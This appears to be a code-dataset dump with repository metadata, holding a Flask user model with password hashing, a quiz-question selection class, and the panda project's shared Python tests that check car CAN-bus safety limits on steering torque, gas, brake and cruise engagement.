] | null | null | null | app/models.py | afexer/apache-gunicorn-flask-socketio | 8d7a1c9475ea7f3f1955d38f5c529a9e23215771 | [
"MIT"
] | 2 | 2020-07-24T17:06:43.000Z | 2020-07-24T17:14:32.000Z | app/models.py | afexer/apache-gunicorn-flask-socketio | 8d7a1c9475ea7f3f1955d38f5c529a9e23215771 | [
"MIT"
] | null | null | null | from werkzeug.security import generate_password_hash, check_password_hash
from app.db import db
from app.lm import lm
from flask_login import UserMixin
class User(UserMixin, db.Model):
    """Application user with hashed-password authentication.

    Mixes Flask-Login's ``UserMixin`` (is_authenticated, get_id, ...) into a
    SQLAlchemy model backed by the ``users`` table.
    """
    __tablename__ = 'users'
    # Primary key used by Flask-Login's get_id()/user loader.
    id = db.Column(db.Integer, primary_key=True)
    # Unique login name; indexed for fast lookup at login time.
    username = db.Column(db.String(16), index=True, unique=True)
    # Werkzeug password hash — the plaintext password is never stored.
    password_hash = db.Column(db.String(128))
    def set_password(self, password):
        """Hash `password` and store the result on this user."""
        self.password_hash = self.get_password_hash(password)
    def get_password_hash(self, password):
        """Return the Werkzeug hash of `password` (no state is modified)."""
        return generate_password_hash(password)
    def verify_password(self, password):
        """Return True when `password` matches the stored hash."""
        result = check_password_hash(self.password_hash, password)
        return result
    @staticmethod
    def register(username, password):
        """Create, persist and return a new user with the given credentials.

        Commits the session, so the returned user already has its id set.
        """
        user = User(username=username)
        user.set_password(password)
        db.session.add(user)
        db.session.commit()
        return user
    def __repr__(self):
        return '<User {0}>'.format(self.username)
@lm.user_loader
def load_user(_id):
    """Flask-Login user loader: map the session-stored id back to a User row."""
    return User.query.get(int(_id))
| 27.815789 | 73 | 0.701987 |
79546bfc7c23df57df635164b95e736d5f13352f | 3,817 | py | Python | paradigm/Selection.py | Paradigm-shift-AI/paradigm-brain | 5347a91dbb45b1352534a256968ce7f6ff6bb299 | [
"MIT"
] | null | null | null | paradigm/Selection.py | Paradigm-shift-AI/paradigm-brain | 5347a91dbb45b1352534a256968ce7f6ff6bb299 | [
"MIT"
] | null | null | null | paradigm/Selection.py | Paradigm-shift-AI/paradigm-brain | 5347a91dbb45b1352534a256968ce7f6ff6bb299 | [
"MIT"
] | null | null | null | import random
import operator
class Selection:
def __init__(self, preprocessed_question, list_of_questions, token=False):
"""
list_of_questions:
[
questionTypeID: [<question_object>],
]
"""
self.preprocessed_question = preprocessed_question
self.list_of_questions = list_of_questions
self.token = token
self.final_question = []
def __get_proper_noun(self):
if self.token:
return self.preprocessed_question["tag-intersection"]
jk = set()
for j in self.preprocessed_question["processed-sentences"]:
if "NNP" in j:
for k in j["NNP"]:
jk.add(k)
return list(jk)
def __select_fill_in_blanks(self):
for i in self.list_of_questions[1]:
if i["answer"] in self.__get_proper_noun():
insert = True
for k in self.final_question:
if i["question"] == k["question"]:
insert = False
break
if insert:
self.final_question.append(i)
def __select_true_or_false(self, type):
if self.token:
question_rank = {}
for i in self.list_of_questions[type]:
rating = 0
for j in self.preprocessed_question["tag-intersection"]:
if str(j) in i["question"]:
rating += 1
question_rank[i["question"]] = rating
sorted_tuple = sorted(question_rank.items(), key=operator.itemgetter(1), reverse=True)
for i in sorted_tuple[0:3]:
for j in self.list_of_questions[type]:
if i[0] == j["question"]:
insert = True
for k in self.final_question:
if j["question"] == k["question"]:
insert = False
break
if insert:
j["question"] = str(j["question"])
j["answer"] = str(j["answer"])
self.final_question.append(j)
else:
for i in self.list_of_questions[type]:
for j in self.preprocessed_question["tag"][0:5]:
if j in i["question"]:
j["question"] = str(j["question"])
j["answer"] = str(j["answer"])
self.final_question.append(i)
def __select_multiple_correct(self):
for i in self.list_of_questions[3]:
if i["answer1"] in self.__get_proper_noun():
if i["answer2"] in self.__get_proper_noun():
insert = True
for k in self.final_question:
if i["question"] == k["question"]:
insert = False
break
if insert:
self.final_question.append(i)
def __select_relevant_question(self):
def f(questionType):
return {
1: self.__select_fill_in_blanks(),
2: self.__select_true_or_false(2),
3: self.__select_multiple_correct(),
4: self.__select_true_or_false(4)
}[questionType]
for questionType in [2, 3, 4, 5]:
if questionType in self.list_of_questions:
f(questionType)
if len(self.final_question) > 2:
random.shuffle(self.final_question)
self.final_question = self.final_question[0:3]
def get_final_question(self):
self.__select_relevant_question()
return self.final_question
| 35.672897 | 98 | 0.496987 |
79546c901c98e841b7e09d9cf97c8e91beff8656 | 22,768 | py | Python | tests/safety/common.py | L-Net-1992/panda | e6c2b0ff01ea4eca283ea7c850e44675edcdebdf | [
"MIT"
] | null | null | null | tests/safety/common.py | L-Net-1992/panda | e6c2b0ff01ea4eca283ea7c850e44675edcdebdf | [
"MIT"
] | null | null | null | tests/safety/common.py | L-Net-1992/panda | e6c2b0ff01ea4eca283ea7c850e44675edcdebdf | [
"MIT"
] | null | null | null | import os
import abc
import unittest
import importlib
import numpy as np
from collections import defaultdict
from typing import Optional, List, Dict
from opendbc.can.packer import CANPacker # pylint: disable=import-error
from panda import ALTERNATIVE_EXPERIENCE, LEN_TO_DLC
from panda.tests.safety import libpandasafety_py
MAX_WRONG_COUNTERS = 5
def package_can_msg(msg):
  """Convert an (address, _, data, bus) tuple into a C CANPacket_t struct.

  This is how Python-side CAN messages are handed to the panda safety code.
  """
  address, _, data, bus = msg
  packet = libpandasafety_py.ffi.new('CANPacket_t *')
  # Addresses beyond the 11-bit standard ID range need the extended flag.
  packet[0].extended = 1 if address >= 0x800 else 0
  packet[0].addr = address
  packet[0].bus = bus
  packet[0].data_len_code = LEN_TO_DLC[len(data)]
  packet[0].data = bytes(data)
  return packet
def make_msg(bus, addr, length=8):
  """Build an all-zero CAN message of `length` bytes on the given bus."""
  payload = b'\x00' * length
  return package_can_msg([addr, 0, payload, bus])
class CANPackerPanda(CANPacker):
  """CANPacker wrapper that emits panda-ready CANPacket_t structs.

  Also keeps a per-message counter so tests can generate correctly counted
  message streams without managing counters themselves.
  """
  def __init__(self, dbc_name):
    super().__init__(dbc_name)
    # Per-message counters; start at -1 so the first increment yields 0.
    self._counters: Dict[str, int] = defaultdict(lambda: -1)
  def make_can_msg_panda(self, name_or_addr, bus, values, counter=False, fix_checksum=None):
    """Pack `values` into the message, bump its counter when `counter` is
    set, optionally run `fix_checksum` on the result, and return the packed
    CANPacket_t."""
    if counter:
      self._counters[name_or_addr] += 1
    msg = self.make_can_msg(name_or_addr, bus, values, counter=self._counters[name_or_addr])
    if fix_checksum is not None:
      msg = fix_checksum(msg)
    return package_can_msg(msg)
class PandaSafetyTestBase(unittest.TestCase):
  """Common base for panda safety tests; wraps the rx/tx safety hooks."""
  @classmethod
  def setUpClass(cls):
    # Abstract base: skip when pytest collects this class directly — only
    # concrete subclasses (which set cls.safety) should actually run.
    if cls.__name__ == "PandaSafetyTestBase":
      cls.safety = None
      raise unittest.SkipTest
  def _rx(self, msg):
    """Feed a received CAN message through the safety rx hook."""
    return self.safety.safety_rx_hook(msg)
  def _tx(self, msg):
    """Ask the safety tx hook whether a message may be sent."""
    return self.safety.safety_tx_hook(msg)
class InterceptorSafetyTest(PandaSafetyTestBase):
  """Shared tests for cars fitted with a gas interceptor (comma pedal)."""
  # Gas reading above which the pedal counts as pressed; overridden by
  # concrete subclasses with the car-specific threshold.
  INTERCEPTOR_THRESHOLD = 0
  @classmethod
  def setUpClass(cls):
    # Abstract base: skip unless run through a concrete subclass.
    if cls.__name__ == "InterceptorSafetyTest":
      cls.safety = None
      raise unittest.SkipTest
  @abc.abstractmethod
  def _interceptor_gas_cmd(self, gas):
    # Build a gas command message addressed to the interceptor.
    pass
  @abc.abstractmethod
  def _interceptor_user_gas(self, gas):
    # Build a user pedal reading message from the interceptor.
    pass
  def test_prev_gas_interceptor(self):
    """The safety code tracks the previous interceptor gas state."""
    self._rx(self._interceptor_user_gas(0x0))
    self.assertFalse(self.safety.get_gas_interceptor_prev())
    self._rx(self._interceptor_user_gas(0x1000))
    self.assertTrue(self.safety.get_gas_interceptor_prev())
    self._rx(self._interceptor_user_gas(0x0))
    self.safety.set_gas_interceptor_detected(False)
  def test_disengage_on_gas_interceptor(self):
    """Pressing the pedal past the threshold disengages controls."""
    for g in range(0, 0x1000):
      self._rx(self._interceptor_user_gas(0))
      self.safety.set_controls_allowed(True)
      self._rx(self._interceptor_user_gas(g))
      remain_enabled = g <= self.INTERCEPTOR_THRESHOLD
      self.assertEqual(remain_enabled, self.safety.get_controls_allowed())
      self._rx(self._interceptor_user_gas(0))
      self.safety.set_gas_interceptor_detected(False)
  def test_alternative_experience_no_disengage_on_gas_interceptor(self):
    """With DISABLE_DISENGAGE_ON_GAS, gas blocks longitudinal only."""
    self.safety.set_controls_allowed(True)
    self.safety.set_alternative_experience(ALTERNATIVE_EXPERIENCE.DISABLE_DISENGAGE_ON_GAS)
    for g in range(0, 0x1000):
      self._rx(self._interceptor_user_gas(g))
      # Test we allow lateral, but not longitudinal
      self.assertTrue(self.safety.get_controls_allowed())
      self.assertEqual(g <= self.INTERCEPTOR_THRESHOLD, self.safety.get_longitudinal_allowed())
    # Make sure we can re-gain longitudinal actuation
    self._rx(self._interceptor_user_gas(0))
    self.assertTrue(self.safety.get_longitudinal_allowed())
  def test_allow_engage_with_gas_interceptor_pressed(self):
    """Engaging while the pedal is already pressed must stay allowed."""
    self._rx(self._interceptor_user_gas(0x1000))
    self.safety.set_controls_allowed(1)
    self._rx(self._interceptor_user_gas(0x1000))
    self.assertTrue(self.safety.get_controls_allowed())
    self._rx(self._interceptor_user_gas(0))
  def test_gas_interceptor_safety_check(self):
    """Gas commands are only allowed when controls are allowed (or zero)."""
    for gas in np.arange(0, 4000, 100):
      for controls_allowed in [True, False]:
        self.safety.set_controls_allowed(controls_allowed)
        if controls_allowed:
          send = True
        else:
          send = gas == 0
        self.assertEqual(send, self._tx(self._interceptor_gas_cmd(gas)))
class TorqueSteeringSafetyTestBase(PandaSafetyTestBase):
  """Shared torque-steering limit tests (absolute and rate limits).

  The limit constants below are all overridden by concrete subclasses with
  the car-specific safety parameters.
  """
  MAX_RATE_UP = 0        # max torque increase per message
  MAX_RATE_DOWN = 0      # max torque decrease per message
  MAX_TORQUE = 0         # absolute torque command limit
  MAX_RT_DELTA = 0       # max torque change within one real-time interval
  RT_INTERVAL = 0        # real-time rate-limit window (us)
  @classmethod
  def setUpClass(cls):
    # Abstract base: skip unless run through a concrete subclass.
    if cls.__name__ == "TorqueSteeringSafetyTestBase":
      cls.safety = None
      raise unittest.SkipTest
  @abc.abstractmethod
  def _torque_cmd_msg(self, torque, steer_req=1):
    # Build a steering torque command message.
    pass
  def _set_prev_torque(self, t):
    """Prime the safety state as if `t` was the last commanded torque."""
    self.safety.set_desired_torque_last(t)
    self.safety.set_rt_torque_last(t)
  def test_steer_safety_check(self):
    """Torque is rejected beyond MAX_TORQUE, or nonzero while disengaged."""
    for enabled in [0, 1]:
      for t in range(-self.MAX_TORQUE * 2, self.MAX_TORQUE * 2):
        self.safety.set_controls_allowed(enabled)
        self._set_prev_torque(t)
        if abs(t) > self.MAX_TORQUE or (not enabled and abs(t) > 0):
          self.assertFalse(self._tx(self._torque_cmd_msg(t)))
        else:
          self.assertTrue(self._tx(self._torque_cmd_msg(t)))
  def test_non_realtime_limit_up(self):
    """From zero, a step of MAX_RATE_UP passes and one more unit fails."""
    self.safety.set_controls_allowed(True)
    self._set_prev_torque(0)
    self.assertTrue(self._tx(self._torque_cmd_msg(self.MAX_RATE_UP)))
    self._set_prev_torque(0)
    self.assertTrue(self._tx(self._torque_cmd_msg(-self.MAX_RATE_UP)))
    self._set_prev_torque(0)
    self.assertFalse(self._tx(self._torque_cmd_msg(self.MAX_RATE_UP + 1)))
    self.safety.set_controls_allowed(True)
    self._set_prev_torque(0)
    self.assertFalse(self._tx(self._torque_cmd_msg(-self.MAX_RATE_UP - 1)))
class DriverTorqueSteeringSafetyTest(TorqueSteeringSafetyTestBase):
DRIVER_TORQUE_ALLOWANCE = 0
DRIVER_TORQUE_FACTOR = 0
@classmethod
def setUpClass(cls):
if cls.__name__ == "DriverTorqueSteeringSafetyTest":
cls.safety = None
raise unittest.SkipTest
@abc.abstractmethod
def _torque_cmd_msg(self, torque, steer_req=1):
pass
def test_non_realtime_limit_up(self):
self.safety.set_torque_driver(0, 0)
super().test_non_realtime_limit_up()
# TODO: make this test something
def test_non_realtime_limit_down(self):
self.safety.set_torque_driver(0, 0)
self.safety.set_controls_allowed(True)
def test_against_torque_driver(self):
self.safety.set_controls_allowed(True)
for sign in [-1, 1]:
for t in np.arange(0, self.DRIVER_TORQUE_ALLOWANCE + 1, 1):
t *= -sign
self.safety.set_torque_driver(t, t)
self._set_prev_torque(self.MAX_TORQUE * sign)
self.assertTrue(self._tx(self._torque_cmd_msg(self.MAX_TORQUE * sign)))
self.safety.set_torque_driver(self.DRIVER_TORQUE_ALLOWANCE + 1, self.DRIVER_TORQUE_ALLOWANCE + 1)
self.assertFalse(self._tx(self._torque_cmd_msg(-self.MAX_TORQUE)))
# arbitrary high driver torque to ensure max steer torque is allowed
max_driver_torque = int(self.MAX_TORQUE / self.DRIVER_TORQUE_FACTOR + self.DRIVER_TORQUE_ALLOWANCE + 1)
# spot check some individual cases
for sign in [-1, 1]:
driver_torque = (self.DRIVER_TORQUE_ALLOWANCE + 10) * sign
torque_desired = (self.MAX_TORQUE - 10 * self.DRIVER_TORQUE_FACTOR) * sign
delta = 1 * sign
self._set_prev_torque(torque_desired)
self.safety.set_torque_driver(-driver_torque, -driver_torque)
self.assertTrue(self._tx(self._torque_cmd_msg(torque_desired)))
self._set_prev_torque(torque_desired + delta)
self.safety.set_torque_driver(-driver_torque, -driver_torque)
self.assertFalse(self._tx(self._torque_cmd_msg(torque_desired + delta)))
self._set_prev_torque(self.MAX_TORQUE * sign)
self.safety.set_torque_driver(-max_driver_torque * sign, -max_driver_torque * sign)
self.assertTrue(self._tx(self._torque_cmd_msg((self.MAX_TORQUE - self.MAX_RATE_DOWN) * sign)))
self._set_prev_torque(self.MAX_TORQUE * sign)
self.safety.set_torque_driver(-max_driver_torque * sign, -max_driver_torque * sign)
self.assertTrue(self._tx(self._torque_cmd_msg(0)))
self._set_prev_torque(self.MAX_TORQUE * sign)
self.safety.set_torque_driver(-max_driver_torque * sign, -max_driver_torque * sign)
self.assertFalse(self._tx(self._torque_cmd_msg((self.MAX_TORQUE - self.MAX_RATE_DOWN + 1) * sign)))
  def test_realtime_limits(self):
    """Within one RT_INTERVAL, commanded torque may only move MAX_RT_DELTA away
    from rt_torque_last; after the interval elapses the window resets."""
    self.safety.set_controls_allowed(True)
    for sign in [-1, 1]:
      self.safety.init_tests()
      self._set_prev_torque(0)
      self.safety.set_torque_driver(0, 0)
      # stepping up to (but not past) MAX_RT_DELTA is allowed
      for t in np.arange(0, self.MAX_RT_DELTA, 1):
        t *= sign
        self.assertTrue(self._tx(self._torque_cmd_msg(t)))
      self.assertFalse(self._tx(self._torque_cmd_msg(sign * (self.MAX_RT_DELTA + 1))))
      self._set_prev_torque(0)
      for t in np.arange(0, self.MAX_RT_DELTA, 1):
        t *= sign
        self.assertTrue(self._tx(self._torque_cmd_msg(t)))
      # Increase timer to update rt_torque_last
      self.safety.set_timer(self.RT_INTERVAL + 1)
      # after the interval, both values are allowed again
      self.assertTrue(self._tx(self._torque_cmd_msg(sign * (self.MAX_RT_DELTA - 1))))
      self.assertTrue(self._tx(self._torque_cmd_msg(sign * (self.MAX_RT_DELTA + 1))))
class MotorTorqueSteeringSafetyTest(TorqueSteeringSafetyTestBase):
  """Base test class for safety modes that limit steering against a measured
  motor torque (torque_meas) rather than driver torque. Subclasses provide
  the concrete CAN message builders."""
  MAX_TORQUE_ERROR = 0        # max allowed |cmd - meas| before blocking
  TORQUE_MEAS_TOLERANCE = 0   # slack applied to min/max measured torque
  @classmethod
  def setUpClass(cls):
    # skip when run directly; only concrete subclasses execute these tests
    if cls.__name__ == "MotorTorqueSteeringSafetyTest":
      cls.safety = None
      raise unittest.SkipTest
  @abc.abstractmethod
  def _torque_meas_msg(self, torque):
    # build a CAN message carrying a measured torque value
    pass
  @abc.abstractmethod
  def _torque_cmd_msg(self, torque, steer_req=1):
    # build a CAN message commanding a torque value
    pass
  def _set_prev_torque(self, t):
    # also seed the measured torque so the error check starts at zero
    super()._set_prev_torque(t)
    self.safety.set_torque_meas(t, t)
  def test_torque_absolute_limits(self):
    # with controls allowed, anything within +/-MAX_TORQUE passes; with
    # controls disallowed only zero torque passes
    for controls_allowed in [True, False]:
      for torque in np.arange(-self.MAX_TORQUE - 1000, self.MAX_TORQUE + 1000, self.MAX_RATE_UP):
        self.safety.set_controls_allowed(controls_allowed)
        self.safety.set_rt_torque_last(torque)
        self.safety.set_torque_meas(torque, torque)
        self.safety.set_desired_torque_last(torque - self.MAX_RATE_UP)
        if controls_allowed:
          send = (-self.MAX_TORQUE <= torque <= self.MAX_TORQUE)
        else:
          send = torque == 0
        self.assertEqual(send, self._tx(self._torque_cmd_msg(torque)))
  def test_non_realtime_limit_down(self):
    # from max torque, ramping down by exactly MAX_RATE_DOWN is allowed;
    # ramping down any slower (by 1 less) is blocked
    self.safety.set_controls_allowed(True)
    torque_meas = self.MAX_TORQUE - self.MAX_TORQUE_ERROR - 50
    self.safety.set_rt_torque_last(self.MAX_TORQUE)
    self.safety.set_torque_meas(torque_meas, torque_meas)
    self.safety.set_desired_torque_last(self.MAX_TORQUE)
    self.assertTrue(self._tx(self._torque_cmd_msg(self.MAX_TORQUE - self.MAX_RATE_DOWN)))
    self.safety.set_rt_torque_last(self.MAX_TORQUE)
    self.safety.set_torque_meas(torque_meas, torque_meas)
    self.safety.set_desired_torque_last(self.MAX_TORQUE)
    self.assertFalse(self._tx(self._torque_cmd_msg(self.MAX_TORQUE - self.MAX_RATE_DOWN + 1)))
  def test_exceed_torque_sensor(self):
    # commanded torque must stay within MAX_TORQUE_ERROR of measured torque
    self.safety.set_controls_allowed(True)
    for sign in [-1, 1]:
      self._set_prev_torque(0)
      for t in np.arange(0, self.MAX_TORQUE_ERROR + 2, 2):  # step needs to be smaller than MAX_TORQUE_ERROR
        t *= sign
        self.assertTrue(self._tx(self._torque_cmd_msg(t)))
      self.assertFalse(self._tx(self._torque_cmd_msg(sign * (self.MAX_TORQUE_ERROR + 2))))
  def test_realtime_limit_up(self):
    # within one RT_INTERVAL the command may move at most MAX_RT_DELTA; once
    # the interval elapses the window resets and larger values pass again
    self.safety.set_controls_allowed(True)
    for sign in [-1, 1]:
      self.safety.init_tests()
      self._set_prev_torque(0)
      for t in np.arange(0, self.MAX_RT_DELTA + 1, 1):
        t *= sign
        self.safety.set_torque_meas(t, t)
        self.assertTrue(self._tx(self._torque_cmd_msg(t)))
      self.assertFalse(self._tx(self._torque_cmd_msg(sign * (self.MAX_RT_DELTA + 1))))
      self._set_prev_torque(0)
      for t in np.arange(0, self.MAX_RT_DELTA + 1, 1):
        t *= sign
        self.safety.set_torque_meas(t, t)
        self.assertTrue(self._tx(self._torque_cmd_msg(t)))
      # Increase timer to update rt_torque_last
      self.safety.set_timer(self.RT_INTERVAL + 1)
      self.assertTrue(self._tx(self._torque_cmd_msg(sign * self.MAX_RT_DELTA)))
      self.assertTrue(self._tx(self._torque_cmd_msg(sign * (self.MAX_RT_DELTA + 1))))
  def test_torque_measurements(self):
    # the tracked min/max measured torque must follow received values, within
    # TORQUE_MEAS_TOLERANCE, and decay toward zero as zero readings arrive
    trq = 50
    for t in [trq, -trq, 0, 0, 0, 0]:
      self._rx(self._torque_meas_msg(t))
    max_range = range(trq, trq + self.TORQUE_MEAS_TOLERANCE + 1)
    min_range = range(-(trq + self.TORQUE_MEAS_TOLERANCE), -trq + 1)
    self.assertTrue(self.safety.get_torque_meas_min() in min_range)
    self.assertTrue(self.safety.get_torque_meas_max() in max_range)
    max_range = range(0, self.TORQUE_MEAS_TOLERANCE + 1)
    min_range = range(-(trq + self.TORQUE_MEAS_TOLERANCE), -trq + 1)
    self._rx(self._torque_meas_msg(0))
    self.assertTrue(self.safety.get_torque_meas_min() in min_range)
    self.assertTrue(self.safety.get_torque_meas_max() in max_range)
    max_range = range(0, self.TORQUE_MEAS_TOLERANCE + 1)
    min_range = range(-self.TORQUE_MEAS_TOLERANCE, 0 + 1)
    self._rx(self._torque_meas_msg(0))
    self.assertTrue(self.safety.get_torque_meas_min() in min_range)
    self.assertTrue(self.safety.get_torque_meas_max() in max_range)
class PandaSafetyTest(PandaSafetyTestBase):
  """Common test suite run against every safety mode: address scanning,
  relay-malfunction protection, forwarding rules, and the standard
  gas/brake/cruise engage-disengage state machine. Subclasses supply the
  per-car CAN message builders and class constants."""
  TX_MSGS: Optional[List[List[int]]] = None  # [[addr, bus], ...] the mode may transmit
  SCANNED_ADDRS = [*range(0x0, 0x800),  # Entire 11-bit CAN address space
                   *range(0x18DA00F1, 0x18DB00F1, 0x100),  # 29-bit UDS physical addressing
                   *range(0x18DB00F1, 0x18DC00F1, 0x100),  # 29-bit UDS functional addressing
                   *range(0x3300, 0x3400),  # Honda
                   0x10400060, 0x104c006c]  # GMLAN (exceptions, range/format unclear)
  STANDSTILL_THRESHOLD: Optional[float] = None  # speed at/below which the car counts as stopped
  GAS_PRESSED_THRESHOLD = 0
  RELAY_MALFUNCTION_ADDR: Optional[int] = None
  RELAY_MALFUNCTION_BUS: Optional[int] = None
  FWD_BLACKLISTED_ADDRS: Dict[int, List[int]] = {}  # {bus: [addr]}
  FWD_BUS_LOOKUP: Dict[int, int] = {}
  @classmethod
  def setUpClass(cls):
    # skip the abstract base and any intermediate *Base classes
    if cls.__name__ == "PandaSafetyTest" or cls.__name__.endswith('Base'):
      cls.safety = None
      raise unittest.SkipTest
  @abc.abstractmethod
  def _user_brake_msg(self, brake):
    pass
  @abc.abstractmethod
  def _speed_msg(self, speed):
    pass
  @abc.abstractmethod
  def _user_gas_msg(self, gas):
    pass
  @abc.abstractmethod
  def _pcm_status_msg(self, enable):
    pass
  # ***** standard tests for all safety modes *****
  def test_tx_msg_in_scanned_range(self):
    # the relay malfunction, fwd hook, and spam can tests don't exhaustively
    # scan the entire 29-bit address space, only some known important ranges
    # make sure SCANNED_ADDRS stays up to date with car port TX_MSGS; new
    # model ports should expand the range if needed
    for msg in self.TX_MSGS:
      self.assertTrue(msg[0] in self.SCANNED_ADDRS, f"{msg[0]=:#x}")
  def test_relay_malfunction(self):
    # each car has an addr that is used to detect relay malfunction
    # if that addr is seen on specified bus, triggers the relay malfunction
    # protection logic: both tx_hook and fwd_hook are expected to return failure
    self.assertFalse(self.safety.get_relay_malfunction())
    self._rx(make_msg(self.RELAY_MALFUNCTION_BUS, self.RELAY_MALFUNCTION_ADDR, 8))
    self.assertTrue(self.safety.get_relay_malfunction())
    for bus in range(0, 3):
      for addr in self.SCANNED_ADDRS:
        self.assertEqual(-1, self._tx(make_msg(bus, addr, 8)))
        self.assertEqual(-1, self.safety.safety_fwd_hook(bus, make_msg(bus, addr, 8)))
  def test_fwd_hook(self):
    # some safety modes don't forward anything, while others blacklist msgs
    for bus in range(0, 3):
      for addr in self.SCANNED_ADDRS:
        # assume len 8
        msg = make_msg(bus, addr, 8)
        fwd_bus = self.FWD_BUS_LOOKUP.get(bus, -1)
        if bus in self.FWD_BLACKLISTED_ADDRS and addr in self.FWD_BLACKLISTED_ADDRS[bus]:
          fwd_bus = -1
        self.assertEqual(fwd_bus, self.safety.safety_fwd_hook(bus, msg), f"{addr=:#x} from {bus=} to {fwd_bus=}")
  def test_spam_can_buses(self):
    # every (addr, bus) pair not whitelisted in TX_MSGS must be blocked
    for bus in range(0, 4):
      for addr in self.SCANNED_ADDRS:
        if all(addr != m[0] or bus != m[1] for m in self.TX_MSGS):
          self.assertFalse(self._tx(make_msg(bus, addr, 8)))
  def test_default_controls_not_allowed(self):
    self.assertFalse(self.safety.get_controls_allowed())
  def test_manually_enable_controls_allowed(self):
    self.safety.set_controls_allowed(1)
    self.assertTrue(self.safety.get_controls_allowed())
    self.safety.set_controls_allowed(0)
    self.assertFalse(self.safety.get_controls_allowed())
  def test_prev_gas(self):
    # gas_pressed_prev must track whether the last gas reading was nonzero
    self.assertFalse(self.safety.get_gas_pressed_prev())
    for pressed in [self.GAS_PRESSED_THRESHOLD + 1, 0]:
      self._rx(self._user_gas_msg(pressed))
      self.assertEqual(bool(pressed), self.safety.get_gas_pressed_prev())
  def test_allow_engage_with_gas_pressed(self):
    # enabling controls while gas is already held should not disengage
    self._rx(self._user_gas_msg(1))
    self.safety.set_controls_allowed(True)
    self._rx(self._user_gas_msg(1))
    self.assertTrue(self.safety.get_controls_allowed())
    self._rx(self._user_gas_msg(1))
    self.assertTrue(self.safety.get_controls_allowed())
  def test_disengage_on_gas(self):
    # a rising edge of gas past the threshold disengages controls
    self._rx(self._user_gas_msg(0))
    self.safety.set_controls_allowed(True)
    self._rx(self._user_gas_msg(self.GAS_PRESSED_THRESHOLD + 1))
    self.assertFalse(self.safety.get_controls_allowed())
  def test_alternative_experience_no_disengage_on_gas(self):
    self._rx(self._user_gas_msg(0))
    self.safety.set_controls_allowed(True)
    self.safety.set_alternative_experience(ALTERNATIVE_EXPERIENCE.DISABLE_DISENGAGE_ON_GAS)
    self._rx(self._user_gas_msg(self.GAS_PRESSED_THRESHOLD + 1))
    # Test we allow lateral, but not longitudinal
    self.assertTrue(self.safety.get_controls_allowed())
    self.assertFalse(self.safety.get_longitudinal_allowed())
    # Make sure we can re-gain longitudinal actuation
    self._rx(self._user_gas_msg(0))
    self.assertTrue(self.safety.get_longitudinal_allowed())
  def test_prev_brake(self):
    # brake_pressed_prev must track the last received brake state
    self.assertFalse(self.safety.get_brake_pressed_prev())
    for pressed in [True, False]:
      self._rx(self._user_brake_msg(not pressed))
      self.assertEqual(not pressed, self.safety.get_brake_pressed_prev())
      self._rx(self._user_brake_msg(pressed))
      self.assertEqual(pressed, self.safety.get_brake_pressed_prev())
  def test_enable_control_allowed_from_cruise(self):
    self._rx(self._pcm_status_msg(False))
    self.assertFalse(self.safety.get_controls_allowed())
    self._rx(self._pcm_status_msg(True))
    self.assertTrue(self.safety.get_controls_allowed())
  def test_disable_control_allowed_from_cruise(self):
    self.safety.set_controls_allowed(1)
    self._rx(self._pcm_status_msg(False))
    self.assertFalse(self.safety.get_controls_allowed())
  def test_cruise_engaged_prev(self):
    for engaged in [True, False]:
      self._rx(self._pcm_status_msg(engaged))
      self.assertEqual(engaged, self.safety.get_cruise_engaged_prev())
      self._rx(self._pcm_status_msg(not engaged))
      self.assertEqual(not engaged, self.safety.get_cruise_engaged_prev())
  def test_allow_brake_at_zero_speed(self):
    # Brake was already pressed
    self._rx(self._speed_msg(0))
    self._rx(self._user_brake_msg(1))
    self.safety.set_controls_allowed(1)
    self._rx(self._user_brake_msg(1))
    self.assertTrue(self.safety.get_controls_allowed())
    self.assertTrue(self.safety.get_longitudinal_allowed())
    self._rx(self._user_brake_msg(0))
    self.assertTrue(self.safety.get_controls_allowed())
    self.assertTrue(self.safety.get_longitudinal_allowed())
    # rising edge of brake should disengage
    self._rx(self._user_brake_msg(1))
    self.assertFalse(self.safety.get_controls_allowed())
    self.assertFalse(self.safety.get_longitudinal_allowed())
    self._rx(self._user_brake_msg(0))  # reset no brakes
  def test_not_allow_brake_when_moving(self):
    # Brake was already pressed
    self._rx(self._user_brake_msg(1))
    self.safety.set_controls_allowed(1)
    self._rx(self._speed_msg(self.STANDSTILL_THRESHOLD))
    self._rx(self._user_brake_msg(1))
    self.assertTrue(self.safety.get_controls_allowed())
    self.assertTrue(self.safety.get_longitudinal_allowed())
    # above standstill, a held brake disengages
    self._rx(self._speed_msg(self.STANDSTILL_THRESHOLD + 1))
    self._rx(self._user_brake_msg(1))
    self.assertFalse(self.safety.get_controls_allowed())
    self.assertFalse(self.safety.get_longitudinal_allowed())
    self._rx(self._speed_msg(0))
  def test_sample_speed(self):
    self.assertFalse(self.safety.get_vehicle_moving())
    # not moving
    self.safety.safety_rx_hook(self._speed_msg(0))
    self.assertFalse(self.safety.get_vehicle_moving())
    # speed is at threshold
    self.safety.safety_rx_hook(self._speed_msg(self.STANDSTILL_THRESHOLD))
    self.assertFalse(self.safety.get_vehicle_moving())
    # past threshold
    self.safety.safety_rx_hook(self._speed_msg(self.STANDSTILL_THRESHOLD + 1))
    self.assertTrue(self.safety.get_vehicle_moving())
  def test_tx_hook_on_wrong_safety_mode(self):
    # collect TX_MSGS from every other safety test module and make sure this
    # mode blocks all of them (with a few documented exceptions)
    files = os.listdir(os.path.dirname(os.path.realpath(__file__)))
    test_files = [f for f in files if f.startswith("test_") and f.endswith(".py")]
    current_test = self.__class__.__name__
    all_tx = []
    for tf in test_files:
      test = importlib.import_module("panda.tests.safety."+tf[:-3])
      for attr in dir(test):
        if attr.startswith("Test") and attr != current_test:
          tx = getattr(getattr(test, attr), "TX_MSGS")
          if tx is not None and not attr.endswith('Base'):
            # No point in comparing different Tesla safety modes
            if 'Tesla' in attr and 'Tesla' in current_test:
              continue
            if {attr, current_test}.issubset({'TestToyotaSafety', 'TestToyotaAltBrakeSafety', 'TestToyotaStockLongitudinal'}):
              continue
            # TODO: Temporary, should be fixed in panda firmware, safety_honda.h
            if attr.startswith('TestHonda'):
              # exceptions for common msgs across different hondas
              tx = list(filter(lambda m: m[0] not in [0x1FA, 0x30C, 0x33D], tx))
            all_tx.append(list([m[0], m[1], attr[4:]] for m in tx))
    # make sure we got all the msgs
    self.assertTrue(len(all_tx) >= len(test_files)-1)
    for tx_msgs in all_tx:
      for addr, bus, test_name in tx_msgs:
        msg = make_msg(bus, addr)
        self.safety.set_controls_allowed(1)
        # TODO: this should be blocked
        if current_test in ["TestNissanSafety", "TestNissanLeafSafety"] and [addr, bus] in self.TX_MSGS:
          continue
